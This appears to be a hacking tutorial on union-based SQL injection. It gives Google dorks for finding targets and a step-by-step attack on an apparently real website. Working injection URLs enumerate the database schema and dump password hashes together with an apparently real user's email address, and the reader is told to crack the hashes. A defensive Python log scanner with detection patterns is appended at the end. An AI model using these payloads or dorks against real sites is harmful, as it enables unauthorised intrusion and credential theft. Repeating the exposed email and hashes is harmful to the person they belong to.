Union Based SQL Injection



An SQL injection attack consists of the "injection" of a SQL query via input data from the client to the application. Through SQL injection an attacker can read sensitive data, modify the database, or act as an administrator. SQL injection flaws occur when data enters a program from an untrusted source and that data is used to dynamically construct a SQL query.

How to find your target....
These are some Google dorks; you can find more on Google :)

inurl:index.php?id=

inurl:buy.php?category=

inurl:article.php?ID=

inurl:play_old.php?id=

inurl:pageid=

Now you have found your target.

So what are you waiting for? Go and try SQL injection.. Don't know how? :(
Let me explain.....

I am going to show you on a live website, but remember, this is only for knowledge purposes. Try it only if you have permission.

Here is my URL: http://abcd.com.bn/cargo/whatsnew_details.php?id=32

First we will check whether our URL is vulnerable to SQL injection or not. To do this we just insert a single quote ('): it will break the backend query and the response will show some SQL error. Let's find out...

http://abcd.com.bn/cargo/whatsnew_details.php?id=32'

Good! It's showing a SQL error, which means we are on the right track. The SQL error is..



Error: Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/megali5/public_html/cargo/whatsnew_details.php on line 5

If it does not show any error, then look for changes in the application, such as missing content or a missing image. You can spot them easily.

For a successful SQL injection our task is to fix this error. For this we use "--+", "--", "#" etc., depending on the backend query; it just comments out the rest of the query.

http://abcd.com.bn/cargo/whatsnew_details.php?id=32'--+

After fixing the error we will look for how many columns are used in the SELECT statement, by using the "ORDER BY" clause.

ORDER BY :- The ORDER BY keyword is used to sort the result by one or more columns.

http://abcd.com.bn/cargo/whatsnew_details.php?id=32'+ORDER BY+1--+ (No error)
http://abcd.com.bn/cargo/whatsnew_details.php?id=32'+ORDER BY+2--+ (No error)
http://abcd.com.bn/cargo/whatsnew_details.php?id=32'+ORDER BY+3--+ (No error)
http://abcd.com.bn/cargo/whatsnew_details.php?id=32'+ORDER BY+4--+ (No error)
.
.
.
http://abcd.com.bn/cargo/whatsnew_details.php?id=32'+ORDER BY+6--+ (No error)

http://abcd.com.bn/cargo/whatsnew_details.php?id=32'+ORDER BY+7--+ (Error)

On ORDER BY 7 it shows an error like the previous one...



Error: Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/megali5/public_html/cargo/whatsnew_details.php on line 5

This error means the query returns only 6 columns (sorting by a 7th column fails), so we will use "6" columns in our SELECT statement...

Now find out which column numbers are visible on the web application by using a UNION SELECT statement...

http://abcd.com.bn/cargo/whatsnew_details.php?id=32'+UNION+SELECT+1,2,3,4,5,6--+



Column numbers "2" and "4" are visible on the web application; these columns are our target..

Sometimes it does not show any columns. No need to panic.. Just add "-" before the id parameter value, so the original row is not returned and only the UNION row is displayed, e.g.

http://abcd.com.bn/cargo/whatsnew_details.php?id=-32'+UNION+SELECT+1,2,3,4,5,6--+

First we look for the version; for this we will use "@@version"...

http://abcd.com.bn/cargo/whatsnew_details.php?id=32'+UNION+SELECT+1,@@version,3,4,5,6--+



Version :- 5.6.21-log

Now the database name; for this we use "database()"....

http://abcd.com.bn/cargo/whatsnew_details.php?id=32'+UNION+SELECT+1,database(),3,4,5,6--+



Database Name :- megali5_cargo

Time for iterating the table names; for this we use "information_schema"..

According to Wikipedia, INFORMATION_SCHEMA is a database within each MySQL instance, the place that stores information about all the other databases that the MySQL server maintains.

The query is...

http://abcd.com.bn/cargo/whatsnew_details.php?id=32'+UNION+SELECT+1,group_concat(table_name),3,4,5,6+from+information_schema.tables+where+table_schema=database()--+

You will be wondering about the group_concat function: the GROUP_CONCAT function concatenates strings from a group into one string, with various options.



Tables Name :-

g2_PendingUser,
g2_PermalinksMap,
g2_PermissionSetMap,
g2_PhotoItem,
g2_PluginMap,
g2_PluginPackageMap

Look for an interesting table; here we found "g2_PendingUser".

After the table we iterate the columns,

http://abcd.com.bn/cargo/whatsnew_details.php?id=32'+UNION+SELECT+1,group_concat(column_name),3,4,5,6+from+information_schema.columns+where+table_name='g2_PendingUser'--+



Columns Name :-

g_id,
g_userName,
g_fullName,
g_hashedPassword,
g_email,
g_language,
g_registrationKey

Here you are seeing some lucrative columns. Yes! You are right: "g_email" and "g_hashedPassword".

Now it's time for the email id and password.

http://abcd.com.bn/cargo/whatsnew_details.php?id=32'+UNION+SELECT+1,group_concat(g_hashedPassword,0x2d,0x2d,g_email),3,4,5,6+from+g2_PendingUser--+

Here 0x2d is the hex value of "-".




Here is your email id and password...

JSh]4dbb33835fb01c9a775f7745911fd44e--she_sell@hotmail.com,
7ZW\8eaee83ba12b12856b3ea9066dcefccf--she_sell@hotmail.com

But you are not as lucky as you thought: the passwords are in hash format :(. Go and crack the hash.
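From the defender's side, every step above leaves a distinct footprint in the web server's access log. As an added example (not code from the original post), here is a small Python scanner that runs over constructed access-log lines mirroring the probe sequence above and tags each request with the stage it corresponds to; the log lines, client IPs and indicator names are assumptions made up for this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (not real logs) that mirror the probe sequence shown on this page.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /cargo/whatsnew_details.php?id=32 HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /cargo/whatsnew_details.php?id=32%27 HTTP/1.1" 200 310
10.0.0.5 - - [01/Jan/2024:10:00:10 +0000] "GET /cargo/whatsnew_details.php?id=32%27+ORDER+BY+7--+ HTTP/1.1" 200 310
10.0.0.5 - - [01/Jan/2024:10:00:20 +0000] "GET /cargo/whatsnew_details.php?id=-32%27+UNION+SELECT+1,database(),3,4,5,6--+ HTTP/1.1" 200 4800
10.0.0.5 - - [01/Jan/2024:10:00:30 +0000] "GET /cargo/whatsnew_details.php?id=32%27+UNION+SELECT+1,group_concat(table_name),3,4,5,6+from+information_schema.tables--+ HTTP/1.1" 200 4900
10.0.0.9 - - [01/Jan/2024:10:01:00 +0000] "GET /cargo/whatsnew_details.php?id=33 HTTP/1.1" 200 5100
"""

# Common Log Format: client IP, then the quoted request line "METHOD target HTTP/x".
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) ')

# One indicator per stage of the walkthrough: quote probe, comment terminator,
# ORDER BY column counting, UNION SELECT, and schema/version enumeration.
INDICATORS = {
    "quote_in_numeric_param": re.compile(r"^-?\d+'"),
    "comment_terminator": re.compile(r"(--|#)\s*$"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_enumeration": re.compile(r"information_schema\.|@@version|database\(\)", re.I),
}

def scan_line(line):
    """Return (ip, param, tags) if any query parameter matches an indicator, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    _, _, query = m.group("target").partition("?")
    for pair in query.split("&"):
        name, _, raw = pair.partition("=")
        value = unquote_plus(raw)  # %27 -> ', + -> space, i.e. what the backend actually sees
        tags = sorted(tag for tag, rx in INDICATORS.items() if rx.search(value))
        if tags:
            return (m.group("ip"), name, tags)
    return None

def scan_log(text):
    """All flagged requests in a log, in order of appearance."""
    return [hit for hit in (scan_line(ln) for ln in text.splitlines()) if hit]

def staged_attackers(hits, min_stages=3):
    """Clients whose requests span at least min_stages distinct indicators (the probe -> count -> dump progression)."""
    seen = {}
    for ip, _, tags in hits:
        seen.setdefault(ip, set()).update(tags)
    return {ip: sorted(tags) for ip, tags in seen.items() if len(tags) >= min_stages}
```

The same check applied at request time (rejecting a non-numeric value for an id parameter) would have stopped the injection at the very first probe, which is what parameterised queries achieve without any pattern matching.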

